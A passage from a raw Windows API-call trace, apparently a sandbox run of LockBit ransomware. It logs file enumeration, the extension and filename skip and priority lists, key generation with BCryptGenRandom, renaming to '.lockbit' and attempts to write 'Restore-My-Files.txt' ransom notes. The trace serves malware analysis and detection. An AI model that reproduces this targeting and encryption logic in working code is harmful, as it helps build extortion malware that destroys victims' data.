office\\media\\office14\\bullets\\bd14868_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.506] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.506] malloc (_Size=0x40068) returned 0x3df0008 [0203.506] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=419) returned 1 [0203.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.507] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.511] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.511] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.511] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.511] free (_Block=0x1fa2ed8) [0203.511] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.511] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.511] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c80200, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca109e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x18c80200, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14869_.GIF", cAlternateFileName="")) returned 1 [0203.511] lstrcmpiW (lpString1=".", lpString2="BD14869_.GIF") returned -1 [0203.511] lstrcmpiW (lpString1="..", lpString2="BD14869_.GIF") returned -1 [0203.511] PathFindExtensionW (pszPath="BD14869_.GIF") returned=".GIF" [0203.511] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.511] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.511] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.511] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.511] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.511] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.512] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.512] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.512] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.512] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.512] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.512] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.512] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14869_.GIF") returned 1 [0203.512] lstrcmpiW (lpString1="ntldr", lpString2="BD14869_.GIF") returned 1 [0203.513] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14869_.GIF") returned 1 [0203.513] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14869_.GIF") returned 1 [0203.513] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14869_.GIF") returned -1 [0203.513] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14869_.GIF") returned 1 [0203.513] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14869_.GIF") returned 1 [0203.513] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.513] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF") returned=".GIF" [0203.513] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.513] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.513] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.514] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF.lockbit") returned 78 [0203.514] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14869_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.515] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.515] malloc (_Size=0x40068) returned 0x3df0008 [0203.515] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=196) returned 1 [0203.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.516] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.519] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.519] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.519] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.519] free (_Block=0x1fa2ed8) [0203.519] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.519] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.519] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19f92f00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca36b40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x19f92f00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14870_.GIF", cAlternateFileName="")) returned 1 [0203.519] lstrcmpiW (lpString1=".", lpString2="BD14870_.GIF") returned -1 [0203.519] lstrcmpiW (lpString1="..", lpString2="BD14870_.GIF") returned -1 [0203.519] PathFindExtensionW (pszPath="BD14870_.GIF") returned=".GIF" [0203.519] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.519] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.519] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.519] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.519] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.519] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.520] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.520] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14870_.GIF") returned 1 [0203.521] lstrcmpiW (lpString1="ntldr", lpString2="BD14870_.GIF") returned 1 [0203.521] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14870_.GIF") returned 1 [0203.521] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14870_.GIF") returned 1 [0203.521] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14870_.GIF") returned -1 [0203.521] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14870_.GIF") returned 1 [0203.521] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14870_.GIF") returned 1 [0203.521] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.521] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF") returned=".GIF" [0203.521] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.521] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.521] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.522] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.522] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF.lockbit") returned 78 [0203.522] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14870_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.524] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.524] malloc (_Size=0x40068) returned 0x3df0008 [0203.524] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=420) returned 1 [0203.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.525] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.525] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.528] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.528] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.528] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.528] free (_Block=0x1fa2ed8) [0203.528] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.528] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.528] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.528] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19f92f00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca36b40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x19f92f00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xc2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14871_.GIF", cAlternateFileName="")) returned 1 [0203.528] lstrcmpiW (lpString1=".", lpString2="BD14871_.GIF") returned -1 [0203.528] lstrcmpiW (lpString1="..", lpString2="BD14871_.GIF") returned -1 [0203.528] PathFindExtensionW (pszPath="BD14871_.GIF") returned=".GIF" [0203.528] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.528] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.528] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.528] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.528] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.528] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.528] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.528] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.528] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.528] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.528] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.528] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.529] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.529] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.529] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.529] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.529] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.529] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".ps1", 